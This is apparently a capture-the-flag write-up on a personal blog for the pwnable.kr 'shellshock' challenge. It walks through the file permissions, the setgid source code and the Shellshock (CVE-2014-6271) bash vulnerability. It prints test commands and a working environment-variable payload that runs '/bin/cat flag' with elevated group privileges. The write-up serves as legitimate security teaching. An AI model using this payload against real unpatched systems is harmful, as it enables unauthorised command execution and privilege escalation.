zacheller@home:~/blog$

posts

about

whoami

contact

pwnable.kr - shellshock

Prompt

Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)

ssh shellshock@pwnable.kr -p2222 (pw:guest)

Analysis

We have an executable called shellshock, its source shellshock.c, and a bash executable.

Let’s check permissions:

shellshock@pwnable:~$ ls -l
total 960
-r-xr-xr-x 1 root shellshock     959120 Oct 12  2014 bash
-r--r----- 1 root shellshock_pwn     47 Oct 12  2014 flag
-r-xr-sr-x 1 root shellshock_pwn   8547 Oct 12  2014 shellshock
-r--r--r-- 1 root root              188 Oct 12  2014 shellshock.c

flag is only readable to root and users in the group shellshock_pwn. The bash ELF can be read and executed by any user. The shellshock file can be read and executed by anyone and has the setgid bit set. When a file has the setgid bit, it executes with the privileges of the group of the user who owns it instead of executing with those of the group of the user who executed it. So, shellshock can open the flag.

shellshock.c:

#include <stdio.h>
int main(){
        setresuid(getegid(), getegid(), getegid());
        setresgid(getegid(), getegid(), getegid());
        system("/home/shellshock/bash -c 'echo shock_me'");
        return 0;
}

setresuid() sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process. The getegid() function returns the effective group ID of the calling process. So, the script will be run with the group ID shellshock_pwn.

The name of this challenge is a hint towards how to exploit bash to read our flag. See an explanation for the Shellshock Bash RCE here. This article explains how we can check for this vulnerability:

env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
env X="() { :;} ; echo busted" `which bash` -c "echo completed"

The systems normal /bin/sh is patched, but the executable in our home folder is not:

shellshock@pwnable:~$ env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
completed
shellshock@pwnable:~$ env X="() { :;} ; echo busted" ~/bash -c "echo completed"
busted
completed

Since shellshock makes it so bash will execute trailing commands when it imports a function definition stored into an environment variable, we just need to specify our desired effect when bash is run.

Solution

Use the CVE-2014-6271 vulnerability to append our desired command to an unused environment variable. Run shellshock to execute bash with the proper permissions to open flag.

shellshock@pwnable:~$ export X="() { :; }; /bin/cat flag;"
shellshock@pwnable:~$ ./shellshock
{flag}
Segmentation fault (core dumped)